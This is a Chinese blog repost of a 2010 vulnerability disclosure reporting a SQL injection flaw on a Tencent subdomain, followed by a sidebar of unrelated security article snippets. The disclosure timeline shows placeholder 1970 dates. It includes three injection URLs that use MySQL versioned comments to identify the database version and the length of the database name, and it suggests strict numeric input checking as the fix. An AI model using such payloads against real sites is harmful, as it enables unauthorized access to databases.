腾讯某频道存在注入漏洞

最新推荐文章于 2025-12-12 22:11:09 发布
原创 最新推荐文章于 2025-12-12 22:11:09 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #hack #漏洞 #网络安全

漏洞详情

披露状态:

2010-07-16: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-18: 细节向公众公开

简要描述:

可测试出数据库版本、数据库用户等,是否有更多利用点请自行测试。

详细说明:

http://my2010.qq.com 频道存在sql注入漏洞

漏洞证明:

简单判断数据库类型,为mysql,版本5.0以上:
http://my2010.qq.com/work/content?type=2&type2=4&fileid=%2873012/*!50000*2*/%29
判断数据库名,长度为9:
http://my2010.qq.com/work/content?type=2&type2=4&fileid=%2873012/*!50000*%28char_length%28database%28%29%29=8%29*/%29
http://my2010.qq.com/work/content?type=2&type2=4&fileid=%2873012/*!50000*%28char_length%28database%28%29%29=9%29*/%29

修复方案:

做严谨的数字类型判断或过滤即可

Sword-heart
关注
AUTOSAR从入门到精通-新一代汽车网络入侵检测及安全增强设计
getusushu的博客
12-28 257
信息通信技术ICT)的发展加速了智能网联汽车的应用。随着智能传感、人工智能、大数据、云计算和5G网络等信息通信技术在新一代汽车电子系统中的应用,辅助驾驶、无人驾驶技术正在快速落地。然而,当无人驾驶、先进辅助驾驶等智能化技术在给用户带来丰富功能和使用便捷性的同时,也给汽车网络带来了日趋严峻的网络安全威胁,新一代汽车所处网络空间已经发生显著改变。近年来不断频发的汽车信息安全召回事件更是引发各界的高度关注,汽车电子是一个典型的信息物理融合系统(ACPS),因CPS。
Java后端面试场景题汇总
12-14 2028
如此大的数据集进行去重(例如50亿数据条目),我们需要考虑内存和存储空间的限制,同时还需要有一个算法。一般来说,这样的数据量无法直接载入内存进行处理,因此需要采用磁盘存储和分布式处理的技术。将数据分为多个批次,每个可以加载到内存中。对每一批数据进行排序和去重,然后存回磁盘。对所有排序且去重后的批次进行归并排序,同时去重。使用哈希函数将数据分配到不同的桶(Bucket)或文件中,确保相同的数据项会落到同一个桶里。对每个桶的数据进行内存中去重操作。
腾讯频道ajax存在注入漏洞
swordheart的博客
04-12 981
漏洞详情 披露状态: 2010-07-17: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-18: 细节向公众公开 简要描述: 和之前的http://www.wooyun.org/bug.php?action=view&id=31 类似,注入点为ajax方法 详细说明: ajax
TK 教主:Android 成为漏洞王?真实漏洞排名可能另有玄机
weixin_34356310的博客
08-09 382
挖掘机技术哪家强,XXXXXX 这句耳熟能详的广告语放在安全业也是可行的,不过,这是一个让厂商不怎么开心的榜单。最近,CVE Details公布了一个最新报告,从中可以看出 2016 年哪些系统漏洞最多,哪些厂家“贡献”的漏洞最多。 先看看“漏洞排行榜”。 于是,一个可能比较惊悚的标题出现了:Android 成 2016 年报告漏洞最多系统,吓...
android安卓源码海量项目合集打包-1
热门推荐
chenhao0568的专栏
06-11 15万+
下载地址 最后更新共计113个分类5177套源码29.2 GB。 卷 新加卷 的文件夹 PATH 列表 卷序列号为 00000200 5E7A:7F30 F:. ├─前台界面 │ ├─3D标签云卡片热门 │ │ Android TagCloudView云标签的灵活运用.rar │ │ Android 实现 标签 拖动 改变位置.rar │ │ android 流式布局和热门标签.zip │ │ ...
从工具到实践:如何在GitHub上保障开源项目安全
A1_3_9_7的博客
05-21 1117
当有人利用外部供应商或能够访问你的企业的数据和系统的第三方组件来渗透你的数字基础设施时,就会发生软件供应链攻击。供应链攻击的类型多种多样,本文将聚焦于开源供应链。任何人都可以通过开源举措为项目的开发做出贡献。利用这个切入点,黑客可以将漏洞编入开源项目中,当企业将该项目引入其软件中时也引入了新的威胁,而且往往是在不知情的情况下,通过遍历依赖或间接依赖引入。2016年的GitHub Universe上,首次引入GitHub Marketplace。它是一个开发者可以找到集成插件并将其落实到工作流程中的地方。
信息安全工程师第二版考试总结+笔记
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
渗透测试实战—教育攻防演练信息收集,零基础入门到精通,收藏这一篇就够了
A1_3_9_7的博客
02-15 699
主要关于信息收集方法、各种方法结合产生的奇效以及成果的记录分享,因为涉及大量信息,图片均已处理,只做演示效果。
立秋至,暑难消,e安在线信息安全快讯
featherli2016的博客
08-06 1143
政府举措 DHS成立国家风险管理中心:保护关键基础设施 关键词:关键基础设施 美国国土安全部(DHS)部长克尔斯滕·尼尔森近日宣布成立新的机构间中心——国家风险管理中心,旨在帮助关键基础设施企业长期评估持续存在的网络威胁以及由此引发的网络风险,尼尔森表示将致力打击入侵和破坏金融、能源以及医疗保健系统的黑客行为,化解科技公司遭受网络攻击的危机。 在经历了2016年大选前黑客入侵国家系统之...
OAuth 2.0 安全案例回顾
weixin_30325071的博客
09-23 293
原文:http://drops.wooyun.org/papers/598 0x00 背景 纵观账号互通发展史,可以发现OAuth比起其它协议(如OpenID)更流行的原因是,业务双方不仅要求账号本身的认证互通(authentication;可理解为“我在双方的地盘姓甚名谁”),而是更需要双方业务流的授权打通(authorization;可理解为“我在双方的地盘上可做什么”),因为后者才能...
OAuth 2.0安全案例回顾
weixin_30920091的博客
09-02 282
转载自:http://www.360doc.com/content/14/0311/22/834950_359713295.shtml 0x00 背景 纵观账号互通发展史,可以发现OAuth比起其它协议(如OpenID)更流行的原因是,业务双方不仅要求账号本身的认证互通(authentication;可理解为“我在双方的地盘姓甚名谁”),而是更需要双方业务流的授权打通(authorizat...
综合一
刘群智的博客
07-27 4634
自我介绍 左固定右自适应布局 这是一个很常见的布局,当然也可以实现右侧自适应,左侧自适应。比如常见的网页中,左侧导航栏是固定的,右侧的内容区要自适应浏览器的大小。 现在我们来看下HTML布局: <div id="outer">   <div id="sidebar" style="height:240px;">固定宽度区</div>   <d
python中文语料分词处理,按字或者词cut_sentence
高颜值的杀生丸(此博客转载自我的博客园)
02-19 2万+
cut_sentence.py import string import jieba import jieba.posseg as psg import logging #关闭jieba日制 jieba.setLogLevel(logging.INFO) jieba.load_userdict("./corpus/keywords.txt") stopwords_path = "....
网络安全】一、虚拟局域网设置和应用
最新发布
dochyi的博客
12-12 912
本实验通过配置跨交换机的VLAN和Trunk链路,验证了VLAN的网络隔离功能。使用3台Cisco交换机和6台PC搭建拓扑,通过创建VLAN4和VLAN14并分配端口,配置Trunk链路实现跨交换机通信。测试结果显示:同VLAN主机可通信,不同VLAN主机无法通信,验证了VLAN能有效隔离广播域并实现访问控制。实验强调了VLAN在网络安全中的重要作用,包括缩小广播域范围和限制非法跨网段访问,同时培养了交换机配置和网络拓扑搭建的实践能力。
网络安全认证考取证书有哪些?
GZ_TOGOGO的博客
12-03 516
这个ISACA颁发的证书,聚焦数据生命周期安全,从分类分级、风险评估到泄露防护,全是企业数据安全岗的核心需求。想当“白帽子黑客”?它由EC-Council推出,专门教合法渗透测试,课程涵盖漏洞扫描、社会工程学、恶意代码分析,全程模拟真实黑客攻击,教你“以攻代防”搞安全。它细分了安全集成、运维、应急响应等7个方向,每个方向都盯紧具体岗位需求,比如“安全运维”就专考服务器防护、漏洞修复这些实操技能。报考门槛不高,大专学历+相关工作经验就行,备考抓牢信息安全原理和案例分析,吃透教材再刷题,通过率稳在70%以上。
渗透测试行业术语扫盲(第六篇)—— Web安全专用类术语
qq_39241682的博客
12-09 865
Web是渗透测试的主战场。要在此作战,不仅要懂攻击漏洞(如上一篇所述),更要理解支撑Web运行的基础身份机制、浏览器安全规则以及攻防双方使用的具体工具与载荷。本篇将深入Web安全的“皮下组织”,从维持登录状态的Cookie,到攻击者留下的Webshell,再到防御者的CSP策略,为你揭示这个战场的完整规则与装备图景。
Web安全】SSRF
qinjilll的博客
12-12 931
SSRF漏洞分析与防御 SSRF(服务器端请求伪造)是一种由服务端发起恶意请求的安全漏洞,允许攻击者访问与服务器相连的内网系统。漏洞成因主要是服务端未对目标地址进行过滤限制,常见于社交分享、在线翻译、图片加载等功能点。 漏洞利用方式包括: 探测内网存活主机和开放端口 利用file协议读取本地敏感文件 访问内网未授权服务(如Redis、MySQL) 结合其他漏洞实现命令执行 防御措施: 白名单限制:仅允许访问可信域名/IP和协议 输入校验:过滤特殊字符,校验IP归属 内网服务加固:禁用未授权访问,设置强密码
网络安全 文件包含漏洞
m0_56970656的博客
12-12 317
文件包含漏洞是一种常见的Web安全漏洞,允许攻击者通过动态包含文件的功能,将恶意文件注入到服务器端执行。通常发生在应用程序使用用户可控的输入(如参数或路径)来动态包含文件时,未对输入进行严格过滤或验证。漏洞分为本地文件包含(LFI)和远程文件包含(RFI)两种类型。
PolarCTF网络安全2025冬季个人挑战赛 wp
lpppp小公主的博客
12-09 942
PolarCTF网络安全2025冬季个人挑战赛复现
腾讯XSS注入漏洞深度分析与解决方案
- **XSS漏洞的挖掘与防御**:该篇可能涉及如何在腾讯系列产品中找到XSS漏洞,以及如何实施防御措施来应对这些漏洞。 #### 描述知识点:感觉还行吧。如果用着有什么问题私我 1. **描述中的情感倾向**: - 这句话...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值